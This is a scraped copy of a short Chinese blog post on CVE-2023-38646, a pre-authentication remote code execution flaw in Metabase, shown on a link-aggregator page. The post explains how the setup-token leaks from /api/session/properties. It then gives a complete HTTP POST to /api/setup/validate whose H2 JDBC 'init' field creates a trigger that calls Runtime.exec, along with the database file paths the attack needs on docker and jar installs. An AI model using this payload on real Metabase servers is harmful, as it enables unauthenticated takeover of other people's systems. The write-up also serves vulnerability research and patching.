5

CVE-2023-38646 Metabase pre-auth rce

 9 months ago
source link: https://y4er.com/posts/cve-2023-38646-metabase-pre-auth-rce/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

CVE-2023-38646 Metabase pre-auth rce

 2023-07-26  2023-07-26  约 393 字  预计阅读 1 分钟 
本文最后更新于 2023-07-26,文中内容可能已过时。

两个版本的jar

https://downloads.metabase.com/v0.46.6.1/metabase.jar
https://downloads.metabase.com/v0.46.6/metabase.jar

需要jdk11

安装的时候可以用h2的jdbc

image.png

抓包发现安装过程中有一个请求 http://192.168.1.178:3000/api/session/properties 其相应包中包含了setup-token 字段

而这个字段在配置h2 jdbc刚好用上,所以造成了未授权rce

image.png
POST /api/setup/validate HTTP/1.1
Host: 192.168.1.178:3000
Content-Length: 451
Accept: application/json
Content-Type: application/json
Cookie: metabase.DEVICE=009e2f5a-8eea-45b0-8d2d-1fafb2ee475f
Connection: close

{
    "token": "41cc5e8c-d06f-4a3d-8f84-5133323b34d8",
    "details": {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules": {},
        "details": {
            "db": "file:./metabase.db;",
            "advanced-options": true,
            "ssl": true,
            "init": "CREATE TRIGGER asd BEFORE SELECT ON INFORMATION_SCHEMA.tables AS '//javascript\njava.lang.Runtime.getRuntime().exec(\"calc\")'"
        },
        "name": "a1",
        "engine": "h2"
    }
}

比较坑的是jdbc的url会默认加上一个 IFEXISTS=TRUE 导致必须存在数据库文件才行,而且数据库文件名必须是xxx.mv.db

根据不同的部署方式,文件名表现不一样

docker中 /metabase.db/metabase.db.mv.db

jar包直接启动 ./metabase.db.mv.db

除了这个metabase.db还有一个/plugins/sample-database.db.mv.db也能用,不过有些docker版本里没有。

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK